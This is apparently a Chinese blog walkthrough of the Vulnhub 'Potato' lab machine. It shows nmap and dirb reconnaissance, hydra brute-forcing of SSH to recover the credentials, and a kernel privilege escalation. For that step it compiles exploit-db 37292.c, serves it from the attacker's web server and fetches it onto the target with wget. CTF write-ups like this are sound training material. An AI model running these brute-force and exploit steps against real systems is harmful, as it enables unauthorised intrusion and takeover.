Vulnhub篇Potato

admin 2020年12月6日16:53:41评论87 views字数 787阅读2分37秒阅读模式

点击蓝字,关注我们


0x00靶机信息

靶机:Potato

难度:简单

Vulnhub下载: 

https://www.vulnhub.com/entry/potato-suncsr-1,556/

公众号回复:Potato (获取国内不限速下载链接)

0x01信息收集

Nmap扫描当前网段,寻找目标靶机IP

Nmap -sP 192.168.12.1/24
Vulnhub篇Potato

Nmap扫描端口

Nmap -p 1-65535 192.168.12.131
Vulnhub篇Potato

只开放了80,7120端口

Dirb扫描目录

Dirb http://192.168.12.131
Vulnhub篇Potato

发现存在info.php

Vulnhub篇Potato

看了一会没有发现什么利用点,转向一个未知的7120端口

折腾好一会,发现是ssh端口

ssh -p 7120 root@192.168.12.131
Vulnhub篇Potato


0x02漏洞利用

直接开始爆破

hydra -l potato -P /usr/share/wordlists/rockyou.txt -vV ssh://192.168.12.131:7120
Vulnhub篇Potato
用户名:potato密码:letmein

查看内核版本

uname -a
Vulnhub篇Potato

查找相关漏洞

searchsploit ubuntu 3.13.0
Vulnhub篇Potato

第一个符合条件,开始利用

编译exp

gcc /usr/share/exploitdb/exploits/linux/local/37292.c -o exp
Vulnhub篇Potato

0x03 提权

开启apache2,将exp放到网站目录下

service apache2 startcp exp /var/www/html
Vulnhub篇Potato

Wget下载exp

wget http://192.168.12.130/exp
Vulnhub篇Potato

执行exp

Vulnhub篇Potato

得到flag

Vulnhub篇Potato

 往期推荐 ·


Vulnhub篇Tomato

Vulnhub篇chili

Vulnhub篇presidential:1

Vulnhub篇Photographerr:1

Vulnhub篇Potato
Vulnhub篇Potato
Vulnhub篇Potato

长按识别二维码关注我们

本文始发于微信公众号(信安小屋):Vulnhub篇Potato

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年12月6日16:53:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub篇Potatohttps://cn-sec.com/archives/196436.html

发表评论

匿名网友 填写信息